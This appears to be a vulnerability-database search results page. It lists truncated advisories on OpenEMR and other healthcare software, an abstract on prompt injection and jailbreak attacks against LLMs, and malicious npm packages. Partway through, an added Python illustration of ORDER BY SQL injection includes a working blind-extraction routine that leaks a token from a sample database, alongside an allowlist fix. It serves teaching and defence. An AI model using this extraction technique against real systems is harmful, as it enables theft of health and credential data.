188 matches found
CVE-2026-33918
OpenEMR is a free and open source electronic health records and medical practice management application. Prior to version 8.0.0.3, the billing file-download endpoint interface/billing/getclaimfile.php only verifies that the caller has a valid session and CSRF token, but does not check any ACL...
CVE-2026-2991
The KiviCare – Clinic & Patient Management System EHR plugin for WordPress is vulnerable to Authentication Bypass in all versions up to, and including, 4.1.2. This is due to the patientSocialLogin function not verifying the social provider access token before authenticating a user. This makes it...
PT-2026-22835
Name of the Vulnerable Software and Affected Versions: OpenEMR versions prior to 8.0.0. Description: OpenEMR is an electronic health records and medical practice management application. A flaw in the MedEx callback endpoint allows unauthenticated access to the practice's MedEx API tokens. This can...
CVE-2026-24908
OpenEMR is a free and open source electronic health records and medical practice management application. Prior to version 8.0.0, an SQL injection vulnerability in the Patient REST API endpoint allows authenticated users with API access to execute arbitrary SQL queries through the sort parameter...
CVE-2026-24487
OpenEMR is a free and open source electronic health records and medical practice management application. Prior to version 8.0.0, an authorization bypass vulnerability in the FHIR CareTeam resource endpoint allows patient-scoped FHIR tokens to access care team data for all patients instead of bein...
EUVD-2026-8703
OpenEMR is a free and open source electronic health records and medical practice management application. Prior to version 8.0.0, an SQL injection vulnerability in the Patient REST API endpoint allows authenticated users with API access to execute arbitrary SQL queries through the sort parameter...
CVE-2026-23627 OpenEMR has SQL Injection in Immunization Search/Report
OpenEMR is a free and open source electronic health records and medical practice management application. Prior to version 8.0.0, an SQL injection vulnerability in the Immunization module allows any authenticated user to execute arbitrary SQL queries, leading to complete database compromise, PHI...
EUVD-2026-8700
OpenEMR is a free and open source electronic health records and medical practice management application. Prior to version 8.0.0, an SQL injection vulnerability in the Immunization module allows any authenticated user to execute arbitrary SQL queries, leading to complete database compromise, PHI...
PT-2026-21974
Name of the Vulnerable Software and Affected Versions: OpenEMR versions prior to 8.0.0. Description: OpenEMR is an electronic health records and medical practice management application. A flaw exists in the Patient REST API endpoint where an authenticated user with API access can execute arbitrary S...
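The three entries above on the Patient REST API sort parameter (CVE-2026-24908, EUVD-2026-8703 and PT-2026-21974) describe one bug class: a caller-controlled value placed into an ORDER BY clause. The following is an added illustration and is not OpenEMR's code; it uses a hypothetical patient listing over an in-memory SQLite database with constructed rows, and shows why an ORDER BY value cannot be protected by parameter binding, how a concatenated sort expression lets an authenticated API user read a table the endpoint never exposes, and the allowlist that closes the hole.

```python
import sqlite3

# Constructed sample data for this illustration; this is not OpenEMR's schema.
# Names are chosen so that sorting by name orders rows differently than sorting by id.
SCHEMA = """
CREATE TABLE patients (id INTEGER PRIMARY KEY, name TEXT, dob TEXT);
CREATE TABLE api_tokens (id INTEGER PRIMARY KEY, secret TEXT);
INSERT INTO patients VALUES (1, 'Zed', '1980-01-01'), (2, 'Bob', '1975-06-30'), (3, 'Amy', '1990-12-12');
INSERT INTO api_tokens VALUES (1, 'tok_s3cr3t');
"""


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def list_patients_unsafe(conn, sort):
    """Vulnerable pattern: the request's sort value is concatenated into ORDER BY.
    Parameter binding does not apply here, since only values can be bound,
    never identifiers or expressions."""
    rows = conn.execute("SELECT id FROM patients ORDER BY " + sort).fetchall()
    return [r[0] for r in rows]


# Hypothetical allowlist mapping request values onto real column names.
ALLOWED_SORT = {"id": "id", "name": "name", "dob": "dob"}


def list_patients_safe(conn, sort, direction="ASC"):
    """Hardened pattern: the request value selects from a fixed allowlist of
    column names and directions; anything else is rejected before a query is built."""
    column = ALLOWED_SORT.get(sort)
    direction = direction.upper()
    if column is None or direction not in ("ASC", "DESC"):
        raise ValueError("invalid sort parameter")
    rows = conn.execute(f"SELECT id FROM patients ORDER BY {column} {direction}").fetchall()
    return [r[0] for r in rows]


def leak_secret_char(conn, position):
    """Blind extraction through the vulnerable listing: a CASE expression in ORDER BY
    flips the row order depending on a comparison against a table the endpoint
    never meant to expose. Binary search over printable ASCII recovers one
    character of api_tokens.secret in at most seven requests."""
    lo, hi = 32, 126
    while lo < hi:
        mid = (lo + hi) // 2
        probe = (
            "(CASE WHEN unicode(substr((SELECT secret FROM api_tokens LIMIT 1), "
            f"{position}, 1)) > {mid} THEN name ELSE id END)"
        )
        order = list_patients_unsafe(conn, probe)
        if order == [3, 2, 1]:   # rows came back sorted by name: comparison held
            lo = mid + 1
        else:                    # rows came back sorted by id: comparison failed
            hi = mid
    return chr(lo)


def leak_secret(conn, length):
    """Recover the first `length` characters of the token using only the sort parameter."""
    return "".join(leak_secret_char(conn, p) for p in range(1, length + 1))


if __name__ == "__main__":
    db = make_db()
    print("safe, sorted by name:", list_patients_safe(db, "name"))
    print("leaked via unsafe sort:", leak_secret(db, 10))
```

The hardened version never lets request text reach the SQL string; it only chooses between server-side constants. Escaping or quoting the sort value would not be a substitute, because ORDER BY needs an identifier, not a string literal.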
PT-2026-21971
Name of the Vulnerable Software and Affected Versions: OpenEMR versions prior to 8.0.0. Description: OpenEMR is an electronic health records and medical practice management application. A flaw exists where patient-scoped FHIR tokens can access care team data for all patients instead of being limited...
Analysis of LLMs against Prompt Injection and Jailbreak Attacks
Large Language Models (LLMs) are widely deployed in real-world systems. Given their broad applicability, prompt engineering has become an efficient tool for resource-scarce organizations to adopt LLMs for their own purposes. At the same time, LLMs are vulnerable to prompt-based attacks. Thus,...
CVE-2020-12032
Baxter ExactaMix EM 2400 Versions 1.10, 1.11 and ExactaMix EM1200 Versions 1.1, 1.2 systems store device data with sensitive information in an unencrypted database. This could allow an attacker with network access to view or modify sensitive data including PHI...
EUVD-2025-178428
Malicious code in index-short-java-phi-virtualize npm...
EUVD-2025-175961
Malicious code in theta-air-char-import-phi npm...
EUVD-2025-175401
Malicious code in zero-finally-new-easy-phi npm...
EUVD-2025-177217
Malicious code in phi-transpile-delta-table-unix npm...
EUVD-2025-177220
Malicious code in phi-private-async-earth-xi npm...
EUVD-2025-177219
Malicious code in phi-secure-deploy-air-finally npm...
EUVD-2025-177216
Malicious code in phi-void-long-reject-import npm...